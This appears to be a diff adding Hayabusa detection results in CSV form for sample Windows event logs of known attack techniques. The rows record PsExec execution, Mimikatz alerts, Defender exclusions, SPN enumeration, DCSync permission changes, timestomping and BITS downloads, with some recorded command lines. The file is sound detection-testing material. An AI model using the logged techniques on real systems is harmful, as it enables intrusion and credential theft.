+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍  :  Path: C:\Windows\System32\mspaint.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimikatz.exe  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe   start-process notepad.exe  :  Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe""  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\SysWOW64\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: powershell.exe   start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe""  @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE""  :  Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: setspn  -T offsec -Q */*  :  Path: C:\Windows\System32\setspn.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
+2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
+2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
+2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles  :  URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
+2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png  :  URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
